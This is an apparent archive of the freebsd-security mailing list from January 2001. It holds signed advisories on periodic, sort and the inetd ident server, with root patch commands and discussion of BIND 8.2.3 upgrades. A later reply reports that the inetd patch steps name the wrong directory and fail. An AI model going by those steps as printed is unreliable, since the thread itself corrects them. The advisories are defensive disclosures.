Malicious local users can cause arbitrary files on the system to be corrupted. IV. Workaround Do not allow periodic to be used in untrusted multi-user environments. Disable the normal periodic system maintenance scripts by either commenting-out or removing the periodic entries in /etc/crontab. V. Solution One of the following: 1) Upgrade the vulnerable FreeBSD system to 4.1.1-STABLE after the correction date. 2) Affected FreeBSD 4.x systems prior to the correction date: Download the patch and the detached PGP signature from the following locations, and verify the signature using your PGP utility. ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:12/periodic.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:12/periodic.patch.asc Execute the following commands as root: # cd /usr/src/usr.sbin/periodic # patch -p < /path/to/patch # make depend && make all install -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOnXXDlUuHi5z0oilAQF2ngP6AoaNPtHkCuJwT07dKfayh9GH14G1HXsK SN3LznlLG3CyK4WBVGnx32p5Ct3zP0sO0QS+UAY9hMDMBprkUN6ewfuJ7gjczffv GgVBeWRxOOdH+/wpYkcTsg7sxKFWqg+xSZAzJEDBAqiFigf/xIrrrCtrDiDvGED2 8/9DxH59f0g= =ZUss -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 13: 6:44 2001 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 30FE737B402; Mon, 29 Jan 2001 13:06:12 -0800 (PST) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-01:12.periodic [REVISED] Reply-To: security-advisories@freebsd.org Message-Id: <20010129210612.30FE737B402@hub.freebsd.org> Date: Mon, 29 Jan 2001 13:06:12 -0800 (PST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:12 Security Advisory FreeBSD, Inc. Topic: periodic uses insecure temporary files [REVISED] Category: core Module: periodic Announced: 2001-01-29 Revised: 2001-01-29 Credits: David Lary Affects: FreeBSD 4.1-STABLE after 2000-09-20, 4.1.1-RELEASE, and 4.1.1-STABLE prior to the correction date. No FreeBSD 3.x versions are affected. Corrected: 2000-11-11 FreeBSD only: Yes 0. Revision History v1.0 2001-01-29 Initial release v1.1 2001-01-29 Correctly credit original problem reporter I. Background periodic is a program to run periodic system functions. II. Problem Description A vulnerability was inadvertently introduced into periodic that caused temporary files with insecure file names to be used in the system's temporary directory. This may allow a malicious local user to cause arbitrary files on the system to be corrupted. By default, periodic is normally called by cron for daily, weekly, and monthly maintenance. Because these scripts run as root, an attacker may potentially corrupt any file on the system. FreeBSD 4.1-STABLE after 2000-09-20, 4.1.1-RELEASE, and 4.1.1-STABLE prior to the correction date are vulnerable. The problem was corrected prior to the release of FreeBSD 4.2. III. Impact Malicious local users can cause arbitrary files on the system to be corrupted. IV. Workaround Do not allow periodic to be used in untrusted multi-user environments. Disable the normal periodic system maintenance scripts by either commenting-out or removing the periodic entries in /etc/crontab. V. Solution One of the following: 1) Upgrade the vulnerable FreeBSD system to 4.1.1-STABLE after the correction date. 2) Affected FreeBSD 4.x systems prior to the correction date: Download the patch and the detached PGP signature from the following locations, and verify the signature using your PGP utility. ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:12/periodic.patch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:12/periodic.patch.asc Execute the following commands as root: # cd /usr/src/usr.sbin/periodic # patch -p < /path/to/patch # make depend && make all install -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOnXa7lUuHi5z0oilAQHW2AP7BP+YRA93Guy+ImRy1O2IHw/6qYBivSA1 fpYrTERUyyBHbe04KypWjloHfzvKIZoYApXdleECkVBPMYwNPNixTYVrU4zR4qbC EjgtF4OhjLjmO/LqbKPiwDC7TEWWi3OtPWwpJlqT7uNoHmg+o6ySTJPPyrpAFuUQ FS8I+DjVESA= =wBFp -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 13: 7:10 2001 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 015E137B698; Mon, 29 Jan 2001 13:06:31 -0800 (PST) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-01:11.inetd [REVISED] Reply-To: security-advisories@freebsd.org Message-Id: <20010129210631.015E137B698@hub.freebsd.org> Date: Mon, 29 Jan 2001 13:06:31 -0800 (PST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:11 Security Advisory FreeBSD, Inc. Topic: inetd ident server allows remote users to partially read arbitrary wheel-accessible files [REVISED] Category: core Module: inetd Announced: 2001-01-29 Revised: 2001-01-29 Credits: dynamo Affects: FreeBSD 3.x (all releases) FreeBSD 4.x (all releases) Corrected: 2000-11-25 (FreeBSD 4.2-STABLE) 2001-01-26 (FreeBSD 3.5-STABLE) FreeBSD only: Yes 0. Revision History v1.0 2001-01-29 Initial release v1.1 2001-01-29 Correctly credit original problem reporter I. Background The inetd ident server is an implementation of the RFC1413 identification server which returns the local username of the user connecting to a remote service. II. Problem Description During internal auditing, the internal ident server in inetd was found to incorrectly set group privileges according to the user. Due to ident using root's group permissions, users may read the first 16 (excluding initial whitespace) bytes of wheel-accessible files. All released versions of FreeBSD prior to the correction date including FreeBSD 3.5.1 and FreeBSD 4.2 are vulnerable. III. Impact Users can read the first 16 bytes of wheel-accessible files. To determine which may be potentially read, execute the following command as root: # find / -group wheel \( -perm -40 -a \! -perm +4 \) -ls The inetd internal ident server is not enabled by default. If you have not enabled the ident portion of inetd, you are not vulnerable. IV. Workaround Disable the internal ident server, if enabled: comment out all lines beginning with "auth" in /etc/inetd.conf, then restart inetd by sending it a SIGHUP: # killall -HUP inetd V. Solution One of the following: Upgrade the vulnerable FreeBSD system to 3.5-STABLE or 4.2-STABLE after the correction date. To patch your present system: download the relevant patch from the below location, and execute the following commands as root: [FreeBSD 4.2 base system] # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:11/inetd-4.2.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:11/inetd-4.2.patch.asc Verify the detached PGP signature using your PGP utility. # cd /usr/src/usr.sbin/inetd # patch -p < /path/to/patch # make depend && make all install # killall -HUP inetd [FreeBSD 3.5.1 base system] # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:11/inetd-3.5.1.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:11/inetd-3.5.1.patch.asc Verify the detached PGP signature using your PGP utility. # cd /usr/src/usr.sbin/inetd # patch -p < /path/to/patch # make depend && make all install # killall -HUP inetd -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOnXa9FUuHi5z0oilAQGoPQP+ItWj4ScnyoBGBQw/CMLQN0XHWcEaT777 dY8IL6U6NeSI0g/XAk5mVk2a0AExqimkhZFtaphg49y8XwjgbWGqtWHh0YMHa4k3 ILtpOKQpDiGRda15FQUX+Pij8m3T1UdOmFQgCw2hFWnLh3eSgye7thHJzBjUlxCM WI5aiOcdOk4= =aAJS -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 13:12:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from ducky.nz.freebsd.org (ns1.unixathome.org [203.79.82.27]) by hub.freebsd.org (Postfix) with ESMTP id 2455737B698 for ; Mon, 29 Jan 2001 13:11:50 -0800 (PST) Received: from xeon (xeon.unixathome.org [192.168.0.18]) by ducky.nz.freebsd.org (8.9.3/8.9.3) with ESMTP id KAA51163 for ; Tue, 30 Jan 2001 10:11:46 +1300 (NZDT) Date: Tue, 30 Jan 2001 10:11:49 +1300 (NZDT) From: Dan Langille X-X-Sender: To: Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:11.inetd In-Reply-To: <20010129203514.6F88237B6A4@hub.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This patch won't work as advertised: On Mon, 29 Jan 2001, FreeBSD Security Advisories wrote: > # cd /usr/src/usr.sbin/inetd That should be /usr, otherwise it will fail to patch. > # patch -p < /path/to/patch Then you need to cd /usr/src/usr.sbin/inetd > # make depend && make all install > # killall -HUP inetd [my thanks to Laz for his help in getting this to work] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 13:19:54 2001 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 5B75F37B699; Mon, 29 Jan 2001 13:19:19 -0800 (PST) From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory: FreeBSD-SA-01:13.sort Reply-To: security-advisories@freebsd.org Message-Id: <20010129211919.5B75F37B699@hub.freebsd.org> Date: Mon, 29 Jan 2001 13:19:19 -0800 (PST) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:13 Security Advisory FreeBSD, Inc. Topic: sort uses insecure temporary files Category: core Module: sort Announced: 2001-01-29 Credits: Discovered during internal auditing Affects: FreeBSD 3.x (all releases), FreeBSD 4.x (all releases prior to 4.2), FreeBSD 3.5-STABLE prior to the correction date. Corrected: 2000-11-11 (FreeBSD 4.1.1-STABLE) 2001-01-01 (FreeBSD 3.5-STABLE) FreeBSD only: NO I. Background sort(1) is a program to sort lines of text. It is externally maintained, contributed software which is included in FreeBSD by default. II. Problem Description During internal auditing, sort(1) was found to use easily predictable temporary file names. It does create these temporary files correctly such that they cannot be "subverted" by a symlink attack, but the program will abort if the temporary filename chosen is already in use. This allows an attacker to cause the sort(1) command to abort, which may have a cascade effect on other scripts which make use of it (such as system management and reporting scripts). For example, it may be possible to use this failure mode to hide the reporting of malicious system activity which would otherwise be detected by a management script. All released versions of FreeBSD prior to the correction date including FreeBSD 3.5.1 and FreeBSD 4.1.1 are vulnerable. The problem was corrected prior to the release of FreeBSD 4.2. III. Impact Attackers can cause the operation of sort(1) to fail, possibly disrupting aspects of system operation. IV. Workaround None appropriate. V. Solution One of the following: Upgrade the vulnerable FreeBSD system to FreeBSD 3.5-STABLE, 4.2-RELEASE, or 4.2-STABLE after the correction date. To patch your present system: download the relevant patch from the below location, and execute the following commands as root: [FreeBSD 4.1.1 base system] # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:13/sort-4.1.1.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:13/sort-4.1.1.patch.asc Verify the detached PGP signature using your PGP utility. # cd /usr/src/gnu/usr.bin/sort # patch -p < /path/to/patch # make depend && make all install [FreeBSD 3.5.1 base system] # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:13/sort-3.5.1.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:13/sort-3.5.1.patch.asc Verify the detached PGP signature using your PGP utility. # cd /usr/src/gnu/usr.bin/sort # patch -p < /path/to/patch # make depend && make all install -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOnXd6VUuHi5z0oilAQF0XAP/d2M9nevTRLhEqTzutYfj2Whxxm1P8HgW 1hRPi3n3r9I7m9cBCjree6N33CRJoa0pdKovL5OgC04AWdRSKhfVHsLJYQz41Vi2 tfqfZCTdhCWmwx9TGeVek9Pk3OrUIwhfzg+YBqX+ioQYaenB+25FHK1cigmXdeWp UZWDyGlrmyM= =vOx+ -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 13:27:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from virtual.sysadmin-inc.com (lists.sysadmin-inc.com [209.16.228.140]) by hub.freebsd.org (Postfix) with ESMTP id A792737B698 for ; Mon, 29 Jan 2001 13:27:00 -0800 (PST) Received: from wkst (virtual2.sysadmin-inc.com [209.16.228.145]) by virtual.sysadmin-inc.com (8.9.1/8.9.1) with SMTP id QAA22201 for ; Mon, 29 Jan 2001 16:27:21 -0500 Reply-To: From: "Peter Brezny" To: Subject: RE: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? Date: Mon, 29 Jan 2001 16:25:57 -0500 Message-ID: <005901c08a3a$121869e0$46010a0a@sysadmininc.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <20010129124450.A26735@xor.obsecurity.org> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org named -v on my 4.2-stable system reports 8.2.3-T6B From the advisory I was under the impression that this one was ok. Did I miss something? Peter Brezny SysAdmin Services Inc. -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Kris Kennaway Sent: Monday, January 29, 2001 3:45 PM To: Si. Cc: freebsd-security@FreeBSD.ORG Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? On Mon, Jan 29, 2001 at 07:55:44PM +0000, Si. wrote: > 1) The nice people ISC. > 2) The nice people at freebsd-security, i.e. Kris and his team ? It's fixed in BIND 8.2.3, which is being imported into 4.x and 3.x as we speak (it's already in -current). I had hoped to have it done by the time the advisories were released, but circumstances conspired to prevent it. The timing of our advisory 01:10 last week has potential for confusion, but that does not relate to these recent bugs. We hope to have a new advisory out in a couple of days, but in the meantime everyone is urged to upgrade to 4.2-STABLE or 3.5-STABLE once the upgrades are in, or switch to the bind8 port (also not yet updated). I'll drop another note when the relevant upgrades are in place. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 13:36:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 0530337B404 for ; Mon, 29 Jan 2001 13:36:29 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id BB504BA2AF; Mon, 29 Jan 2001 13:36:58 -0800 (PST) Date: Mon, 29 Jan 2001 13:36:58 -0800 From: Kris Kennaway To: Peter Brezny Cc: freebsd-security@FreeBSD.ORG Subject: Re: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? Message-ID: <20010129133658.A27202@xor.obsecurity.org> References: <20010129124450.A26735@xor.obsecurity.org> <005901c08a3a$121869e0$46010a0a@sysadmininc.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="UlVJffcvxoiEqYs2" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <005901c08a3a$121869e0$46010a0a@sysadmininc.com>; from peter@sysadmin-inc.com on Mon, Jan 29, 2001 at 04:25:57PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --UlVJffcvxoiEqYs2 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Jan 29, 2001 at 04:25:57PM -0500, Peter Brezny wrote: > named -v on my 4.2-stable system reports 8.2.3-T6B >=20 > >From the advisory I was under the impression that this one was ok. Did I > miss something? Yes, it affects all versions before 8.2.3-RELEASE. Kris --UlVJffcvxoiEqYs2 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6deJ6Wry0BWjoQKURAt72AJ0XQjUEHi8yit1WMVIY1KuMJSfCUQCgiddy hj87wC5IP8ywmFor6356d8s= =pwkm -----END PGP SIGNATURE----- --UlVJffcvxoiEqYs2-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 13:37:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id D3F5337B6A5; Mon, 29 Jan 2001 13:37:25 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id 2E276BA2AF; Mon, 29 Jan 2001 13:37:56 -0800 (PST) Date: Mon, 29 Jan 2001 13:37:56 -0800 From: Kris Kennaway To: Dan Langille Cc: freebsd-security@FreeBSD.ORG, security-officer@FreeBSD.org Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:11.inetd Message-ID: <20010129133756.B27202@xor.obsecurity.org> References: <20010129203514.6F88237B6A4@hub.freebsd.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="KFztAG8eRSV9hGtP" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from dan@langille.org on Tue, Jan 30, 2001 at 10:11:49AM +1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --KFztAG8eRSV9hGtP Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Jan 30, 2001 at 10:11:49AM +1300, Dan Langille wrote: > This patch won't work as advertised: Ok, we'll have to be more careful with that in future. Thanks. Kris --KFztAG8eRSV9hGtP Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6deKzWry0BWjoQKURAvz1AJ0XXe2s/ohWbPM6m4xv6TYd7xfayACglcMb TfyF3bRfNuaBfjboJRzzqrs= =KCGT -----END PGP SIGNATURE----- --KFztAG8eRSV9hGtP-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 14:32:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id 860BF37B404 for ; Mon, 29 Jan 2001 14:32:31 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id 3D7F0BA4E8; Mon, 29 Jan 2001 14:33:01 -0800 (PST) Date: Mon, 29 Jan 2001 14:33:00 -0800 From: Kris Kennaway To: security@freebsd.org Subject: BIND 8.2.3 upgrade available Message-ID: <20010129143300.A38419@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="NzB8fVQJ5HfG6fxh" Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --NzB8fVQJ5HfG6fxh Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Okay, BIND 8.2.3 is now in 4.2-STABLE (3.5-STABLE will probably be updated tomorrow). Some of the cvsup mirrors may take a little while to receive the update though, so be warned. They should all have it in an hour or so. I have also just upgraded the net/bind8 port, which is another option for those of you running 3.x (or 2.x for that matter), or who can't afford to do a full buildworld right now. Remember to switch named_program in /etc/rc.conf to use the new version, if you install the port. Kris --NzB8fVQJ5HfG6fxh Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6de+cWry0BWjoQKURAtlZAKDvHbrJPLmQ86kpMKiD2ifVF7AOXQCfYBE1 UXJRh/PDSyW38WgjpFIlfUM= =i9Zj -----END PGP SIGNATURE----- --NzB8fVQJ5HfG6fxh-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 14:46:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from virtual.sysadmin-inc.com (lists.sysadmin-inc.com [209.16.228.140]) by hub.freebsd.org (Postfix) with ESMTP id 8057237B6A0 for ; Mon, 29 Jan 2001 14:46:35 -0800 (PST) Received: from wkst (virtual2.sysadmin-inc.com [209.16.228.145]) by virtual.sysadmin-inc.com (8.9.1/8.9.1) with SMTP id RAA25189 for ; Mon, 29 Jan 2001 17:46:58 -0500 Reply-To: From: "Peter Brezny" To: Subject: RE: BIND 8.2.3 upgrade available Date: Mon, 29 Jan 2001 17:45:33 -0500 Message-ID: <006901c08a45$30d64860$46010a0a@sysadmininc.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <20010129143300.A38419@xor.obsecurity.org> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is there a big reason why anyone would not want to just go ahead and run bind 9? TIA Peter Brezny SysAdmin Services Inc. -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Kris Kennaway Sent: Monday, January 29, 2001 5:33 PM To: security@FreeBSD.ORG Subject: BIND 8.2.3 upgrade available Okay, BIND 8.2.3 is now in 4.2-STABLE (3.5-STABLE will probably be updated tomorrow). Some of the cvsup mirrors may take a little while to receive the update though, so be warned. They should all have it in an hour or so. I have also just upgraded the net/bind8 port, which is another option for those of you running 3.x (or 2.x for that matter), or who can't afford to do a full buildworld right now. Remember to switch named_program in /etc/rc.conf to use the new version, if you install the port. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 15: 1: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by hub.freebsd.org (Postfix) with ESMTP id D127737B699 for ; Mon, 29 Jan 2001 15:00:44 -0800 (PST) Received: (from root@localhost) by cage.simianscience.com (8.11.1/8.11.1) id f0TN0h391810; Mon, 29 Jan 2001 18:00:43 -0500 (EST) (envelope-from mike@sentex.net) Received: from chimp (fcage [192.168.0.2]) by cage.simianscience.com (8.11.2/8.11.1av) with ESMTP id f0TN0b791802; Mon, 29 Jan 2001 18:00:37 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <4.2.2.20010129175758.03255570@marble.sentex.net> X-Sender: mdtancsa@marble.sentex.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Mon, 29 Jan 2001 18:00:36 -0500 To: , From: Mike Tancsa Subject: RE: BIND 8.2.3 upgrade available In-Reply-To: <006901c08a45$30d64860$46010a0a@sysadmininc.com> References: <20010129143300.A38419@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 05:45 PM 1/29/2001 -0500, Peter Brezny wrote: >Is there a big reason why anyone would not want to just go ahead and run >bind 9? I dont think all the features are there yet. At least the last time I looked at it, there were some things unimplemented. Also, the configuration is not totally compatible. I also found it to be a little unpredictable when I tried version 9.0.1. Perhaps its more stable now, but I personally would wait another month or so for it to shake out. ---Mike -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Network Administration, mike@sentex.net Sentex Communications www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 15:20:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from pozitif.net (unknown [213.194.71.201]) by hub.freebsd.org (Postfix) with SMTP id A0BB637B699 for ; Mon, 29 Jan 2001 15:20:23 -0800 (PST) Received: from pozitif.net ([62.29.24.236]) by pozitif.net ; Tue, 30 Jan 2001 01:28:32 +0200 Message-ID: <3A75FABD.AA021EE2@pozitif.net> Date: Tue, 30 Jan 2001 01:20:29 +0200 From: Mehmet Hinc X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.2-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: bind8.2.3 and installation problem Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Patching file doc/man/Makefile using Plan A... Hunk #1 succeeded at 52. Hunk #2 succeeded at 105. done Hmm... Looks like a unified diff to me... The text leading up to this was: -------------------------- |--- src/bin/Makefile.orig Sat Dec 23 00:02:48 2000 |+++ src/bin/Makefile Mon Jan 29 14:11:13 2001 -------------------------- Patching file src/bin/Makefile using Plan A... Hunk #1 failed at 58. 1 out of 1 hunks failed--saving rejects to src/bin/Makefile.rej done >> Patch patch-ac failed to apply cleanly. >> Patch(es) patch-aa patch-ab applied cleanly. *** Error code 1 Stop in /usr/ports/net/bind8. *** Error code 1 Stop in /usr/ports/net/bind8. *** Error code 1 What ??????????? Why??????????? I updated my ports and tried to install bind8.2.3 because bind8.2.2 has had a vulnerability , so While I was installing it, I had a error msgs. (in the up) please let me know How can I fix it !!! Thanks all Mehmet Hinc From Turkey To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 15:32: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 151EE37B69D for ; Mon, 29 Jan 2001 15:31:47 -0800 (PST) Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id f0TNViq04311; Mon, 29 Jan 2001 15:31:44 -0800 (PST) Date: Mon, 29 Jan 2001 15:31:44 -0800 From: Alfred Perlstein To: Kris Kennaway Cc: security@FreeBSD.ORG Subject: Re: BIND 8.2.3 upgrade available Message-ID: <20010129153144.H26076@fw.wintelcom.net> References: <20010129143300.A38419@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010129143300.A38419@xor.obsecurity.org>; from kris@obsecurity.org on Mon, Jan 29, 2001 at 02:33:00PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org * Kris Kennaway [010129 14:34] wrote: > Okay, BIND 8.2.3 is now in 4.2-STABLE (3.5-STABLE will probably be > updated tomorrow). Some of the cvsup mirrors may take a little while > to receive the update though, so be warned. They should all have it in > an hour or so. > > I have also just upgraded the net/bind8 port, which is another option > for those of you running 3.x (or 2.x for that matter), or who can't > afford to do a full buildworld right now. Remember to switch > named_program in /etc/rc.conf to use the new version, if you install > the port. Is there any chance that the bind and sendmail people could backport -DNO_SENDMAIL and -DNO_NAMED to 3.x (and maybe 2.x)? I may take a shot at it, but it'd be a nice thing to add to /etc/make.conf on older boxes. -- -Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org] "I have the heart of a child; I keep it in a jar on my desk." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jan 29 15:52:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id B36D137B69E for ; Mon, 29 Jan 2001 15:52:25 -0800 (PST) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id SAA45703; Mon, 29 Jan 2001 18:52:06 -0500 (EST) (envelope-from wollman) Date: Mon, 29 Jan 2001 18:52:06 -0500 (EST) From: Garrett Wollman Message-Id: <200101292352.SAA45703@khavrinen.lcs.mit.edu> To: Mike Tancsa Cc: freebsd-security@FreeBSD.ORG Subject: RE: BIND 8.2.3 upgrade available In-Reply-To: <4.2.2.20010129175758.03255570@marble.sentex.net> References: <20010129143300.A38419@xor.obsecurity.org> <006901c08a45$30d64860$46010a0a@sysadmininc.com> <4.2.2.20010129175758.03255570@marble.sentex.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > I dont think all the features are there yet. At least the last time I > looked at it, there were some things unimplemented. At LISA, Vixie said that 9.0 was probably not what most people wanted, but 9.1 should be solid. Unfortunately, 9.1 still lacks some features (like `ndc status') -- but it has gained some new useful ones, like the ability to do `ndc' over the network, securely. I'm running it on my desktop right now, and we may well deploy it to our servers next month if no 